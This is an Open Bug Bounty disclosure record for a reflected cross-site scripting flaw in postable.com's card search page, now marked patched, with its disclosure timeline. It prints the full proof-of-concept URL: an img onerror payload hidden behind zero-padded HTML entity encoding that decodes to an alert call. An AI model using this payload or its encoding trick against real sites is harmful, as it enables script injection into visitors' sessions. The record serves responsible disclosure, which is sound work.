postable.com XSS vulnerability

2017-04-22T00:26:00
ID OBB:226551
Type openbugbounty
Reporter KushalJaisingh
Modified 2017-07-17T05:15:00

Description

Vulnerable URL:
https://www.postable.com/cards/grid.php?keyword=%3Cimg+src%3Dx+onerror%3D%22%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%22%3E
Details:

Description| Value
---|---
Patched:| Yes, at 24.07.2017
Latest check for patch:| 24.07.2017 23:27 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 130986
VIP website status:| No
Check postable.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 April, 2017 00:26 GMT
Vulnerability existence verified and confirmed| 24 April, 2017 04:50 GMT
Generic security notifications sent to website owner| 24 April, 2017 04:50 GMT
Notification sent to subscribers (without technical details)| 24 April, 2017 06:17 GMT
Vulnerability details disclosed by researcher| 17 July, 2017 05:15 GMT